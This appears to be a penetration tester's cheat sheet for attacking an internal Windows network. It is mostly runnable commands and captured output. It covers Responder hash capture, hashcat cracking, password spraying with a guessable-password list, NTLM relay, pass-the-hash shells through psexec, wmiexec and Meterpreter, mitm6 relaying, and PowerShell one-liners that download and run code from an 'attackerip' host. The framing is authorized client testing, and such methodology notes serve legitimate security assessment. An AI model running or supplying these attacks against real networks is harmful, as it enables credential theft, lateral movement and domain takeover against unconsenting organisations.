Basic Internal Network test
Slightly less than the minimum standard
  • Start responder
  • Start nessus
  • Check outbound internet access

Host Discovery

If not given targets list try Nmap Ping Scan Private Ranges and start responder
1
sudo responder -I eth0
2
3
nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
4
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp
5
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp
6
7
# Loud so only use if required
8
masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
9
masscan 172.16.0.0/12 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
10
masscan 192.168.0.0/16 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
11
12
#Note down IP addresses from responder
13
responder -I eth0
14
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp
15
16
#Note current IP address & scan range
17
ifconfig
18
nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp
19
20
#netdiscover
21
netdiscover -i eth0 -P
22
23
#NBTScan
24
nbtscan 192.168.1.0/24
Copied!
Now cat grep and sort the IP addresses into a file called Targets.txt
If given a range do the following
1
nmap -sn 192.168.10.0/24 -n | grep report | cut -d ' ' -f 5 | tee -a ipaddresses.txt | tee -a targets.txt
2
nmap -sn 192.168.10.0/24 | grep report | cut -d ' ' -f 5- | tee -a host-ip.txt
3
Copied!

Nmap Scans

1
mkdir Scans
2
nmap -p 21 -n --open -iL targets.txt -oN Scans/ftp
3
nmap -p 22 -n --open -iL targets.txt -oN Scans/ssh
4
nmap -p 23 -n --open -iL targets.txt -oN Scans/telnet
5
nmap -p 80 -n --open -iL targets.txt -oN Scans/http
6
nmap -p 443 -n --open -iL targets.txt -oN Scans/https
7
nmap -p 445 -n --open -iL targets.txt -oN Scans/smb
8
nmap -p 3389 -n --open -iL targets.txt -oN Scans/rdp
9
10
cat Scans/ftp | grep for | cut -d " " -f 5 > ftphosts.txt
11
cat Scans/ssh | grep for | cut -d " " -f 5 > sshhosts.txt
12
cat Scans/telnet | grep for | cut -d " " -f 5 > telnethosts.txt
13
cat Scans/http | grep for | cut -d " " -f 5 > httphosts.txt
14
cat Scans/https | grep for | cut -d " " -f 5 > httpshosts.txt
15
cat Scans/smb | grep for | cut -d " " -f 5 > smbhosts.txt
16
cat Scans/rdp | grep for | cut -d " " -f 5 > rdphosts.txt
Copied!

Scanning

Start Nessus on discovered IP addresses
Run networkscan.sh against all targets.txt using rush
Modify if running slowly (thousands of hosts) and reduce the amount of ports it is looking at.
Find OS version with cme
1
crackmapexec smb smbhosts.txt | tee -a smb-os-versionst.txt
Copied!
Make a note of the domain etc and older OS's

Network Service Scan

Run this as root as some of the nmap scans require privs and sudo can be flakey
Requirements
1
go get -u github.com/shenwei356/rush/
Copied!
Usage
1
~/go/bin/rush -i targets.txt -c "./networkscan.sh {}"
Copied!
1
mkdir -p networkscan
2
cd networkscan
3
target=$(echo $1 | cut -d "/" -f 3)
4
userlist=~/jdksec/Payloads/top-usernames-shortlist.txt
5
passlist=~/jdksec/Payloads/darkweb2017-top100.txt
6
line="\n=====================\n"
7
mkdir -p $target
8
cd $target
9
mkdir nmap-basic
10
mkdir nmap-udp
11
echo "#####################################################################" | tee -a report-$target.txt
12
echo "Scan report for $target" |tee -a report-$target.txt
13
echo "#####################################################################" | tee -a report-$target.txt
14
echo "$line Nmap Scan for $target...$line " | tee -a report-$target.txt
15
ports=$(nmap -Pn -p- --min-rate=1000 -T4 $target | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
16
echo "## Open Ports:\n";for i in $(echo $ports | sed 's/,/\n/g'); do echo $target:$i; done | tee -a ports-$target.txt
17
echo "\n"
18
nmap -Pn -sC -sV -p $ports $target -oN nmap-basic/$target
19
cat nmap-basic/* >> report-$target.txt
20
echo "$line Nmap UDP ...$line " | tee -a report-$target.txt
21
sudo nmap -sUVC --open $target --top-ports 20 -oN nmap-udp/$target
22
cat nmap-udp/* >> report-$target.txt
23
cd nmap-basic/
24
grep -Hari "/tcp" | grep -v ":|" >> ../services-$target.txt
25
cd ../
26
cd nmap-udp/
27
grep -Hari "/udp" | grep -v filtered >> ../services-$target.txt
28
cd ../
29
echo "$line Services ...$line " | tee -a report-$target.txt
30
cat services-$target.txt | tee -a report-$target.txt
31
echo "$line Ports ...$line " | tee -a report-$target.txt
32
cat ports-$target.txt | tee -a report-$target.txt
33
mv nmap-basic/$target nmap-tcp-$target.txt
34
mv nmap-udp/$target nmap-udp-$target.txt
35
/bin/rm -rf nmap-udp
36
/bin/rm -rf nmap-basic
Copied!

Gather Webservers

1
cat networkscan/*/service* | cut -d '/' -f 1 | tee -a ports.txt | ~/go/bin/httprobe| tee -a webservers.txt
Copied!
Now open in firefox, check default creds etc
1
for i in $(cat webservers.txt); do firefox $i; sleep 1; done
Copied!

Scan with nuclei

1
cat webservers.txt | ~/go/bin/nuclei -nts -nc -silent | tee -a vulnscan.txt
Copied!

Basic Vuln scan quick wins

1
msfconsole -qx "color false;use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set rhosts file://rdphosts.txt; set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
2
msfconsole -qx "color false;use auxiliary/scanner/smb/smb_ms17_010; set rhosts file://smbhosts.txt set lhost eth0;run; quit" | grep -i "vulnerable" | tee -a vulnscan.txt
Copied!

Check responder for hashes and crack with hashcat

1
cat /usr/share/responder/logs/*NTLM* | sort -u >> hashes.txt; cat hashes.txt | sort -u -o hashes.txt
2
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
3
4
# Much Slower so use npk if possible or cloud cracker
5
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule
6
hashcat --force -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -r OneRuleToRuleThemAll.rule
Copied!
Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl
1
cewl -w clientwordlist.txt -d 5 -m 8 https://www.clientsite.com/
Copied!
Then repeat the cracking process with a better password/rule list.

Domain enumeration

Get DC List
1
# Windows command
2
nltest /DCLIST:domain.local
3
4
# Linux Commands
5
cat /etc/resolv.conf
6
7
nmap -p 88,389,636 -iL targets.txt --open | tee -a domaincontrollers.txt
8
9
for i in (cat Targets.txt); do nslookup $i | grep "dc"; done
10
11
nslookup
12
> set type=all
13
_ldap._tcp.dc._msdcs.DOMAIN
Copied!
Get user list
1
rpcclient -U "domain\\username" 10.0.0.1 (DC)
2
rpcclient gt; enumdomusers
Copied!
Copy list of users to "rpcuserlist.txt" file and sort:
1
cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt
Copied!

Password spray domain users

Set a timer for every 30 minutes and rerun this attack.
May be worth checking the password lockout policy with the client if in a sensitive environment.
1
msfconsole -q
2
set rhosts domaincontrollerip
3
use auxiliary/scanner/smb/smb_login
4
set SMBDomain domain
5
set USER_FILE DomainUsers.txt
6
set SMBPass firstpassword
7
date << adds a timestamp
8
run
Copied!
When time is up change the password and rerun.
Passwords to try:
1
Clientname2019
2
Location2019
3
Password12345!
4
Summer2019!
5
Spring2019!
6
Summer2018!
7
Password2018!
8
Welcome2018!
9
Password 2018!
Copied!

Find open file servers

SMB Map

Find open SMB shares which are available unauthenticated
1
for i in $(cat targets.txt);do smbmap -H $i; done | tee -a smbmap-output.txt
Copied!
Find open writable shares and search for authenticated file servers:
1
for i in $(cat targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
2
leafpad SMBMap-Output.txt
3
ctrl + f WRITE (Search for writable folders)
Copied!

EyeWitness

1
python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml
Copied!

NTLM Relay

Modify Responder.conf to turn off HTTP and SMB
1
[Responder Core]
2
3
; Servers to start
4
SQL = On
5
SMB = Off << turn off
6
Kerberos = On
7
FTP = On
8
POP = On
9
SMTP = On
10
IMAP = On
11
HTTP = Off << turn off
12
HTTPS = On
13
DNS = On
14
LDAP = On
Copied!
Start responder
1
python Responder.py -I <interface> -r -d -w
2
responder -I <interface> -r -d -w
Copied!
Create a list of targets with SMB signing disabled.
1
nmap -n -p 137,139,445 --script=smb-security-mode -iL smbhosts.txt | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt
Copied!
Now start ntlmrelayx.py against the targets
1
python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt
Copied!
If you capture a high priv users account it will drop the hashes from the system
Now use psexec within metasploit to login to the target
1
msfconsole
2
use exploit/windows/smb/psexec
3
set lhost 192.168.1.1
4
set rhost 192.168.1.11
5
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
6
exploit
Copied!
Sometimes ntlmrelay fails, to fix, run the following
1
Clone latest impacket
2
cd impacket
3
sudo python3.10 -m pip install . --user
4
python3.10 examples/ntlmrelayx.py -tf ../smbsigningdisabled.txt
Copied!

Pass the hash

Either will do, once the enumeration has finished upload the csv files to your attacker machine.
Then run
1
python ntlmrelayx.py -tf smbsigningdisabled.txt
Copied!
1
[email protected]:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
2
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
3
# Administrator: account's name
4
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
5
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash
Copied!
1
[email protected]:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
2
E_md4hash wrapper called.
3
HASH PASS: Substituting user supplied NTLM HASH...
4
Microsoft Windows \[Version 6.3.9600\]
5
(c) 2013 Microsoft Corporation. All rights reserved.
6
7
C:\Windows\system32>whoami
8
Server\Administrator
Copied!
1
[email protected]:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
2
[email protected]:~# pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
3
[email protected]:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
4
[email protected]:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
Copied!
1
[email protected]:~# wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 [email protected]
2
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
3
4
[*] SMBv3.0 dialect used
5
[!] Launching semi-interactive shell - Careful what you execute
6
[!] Press help for extra shell commands
7
C:\>
Copied!
1
[email protected]:~# apt-get update
2
[email protected]:~# apt-get install freerdp-x11
3
[email protected]:~# xfreerpd /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25
Copied!
1
msf > use auxiliary/admin/smb/psexec_command
2
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5
3
msf exploit(psexec) > set SMBUser Administrator
4
msf exploit(psexec) > set SMBDomain WORKGROUP
5
msf exploit(psexec) > run
6
[*] Started reverse TCP handler on 192.168.1.24:4444
7
[*] 192.168.1.25:445 - Connecting to the server...
8
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
9
[*] 192.168.1.25:445 - Selecting PowerShell target
10
[*] 192.168.1.25:445 - Executing the payload...
11
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
12
[*] Sending stage (957999 bytes) to 192.168.1.25
13
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200
14
15
meterpreter > exit
Copied!
This will output the local hashes if you capture a domain admins NTLM hash.
Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py

Bloodhound

Once on the domain as a windows user run the following:
1
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')"
2
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')"
Copied!
Once on your attacker machine make sure you have bloodhound installed and then execute:
1
neoj4 console
2
bloodhound
Copied!
Visit 127.0.0.1:7687
Enter your password and upload the csv files you extracted from the target.
Click queries and then find shortest path to domain admin

MITM6

1
git clone https://github.com/fox-it/mitm6.git
2
cd mitm6
3
mitm6 -d domain.local
Copied!
In a new window
1
ntlmrelayx.py -6 -t ldaps://domaincontrollerip -wh fakewpad.domain.local -l data
Copied!
Wait 30 mins to an hour for the IPV6 to update
1
cd data
2
firefox domain_users_by_group.html
Copied!
Review ntlmrelayx.py output and look for new user and password added when a DA logs in
The worst of both worlds: Combining NTLM Relaying and Kerberos delegation
dirkjanm.io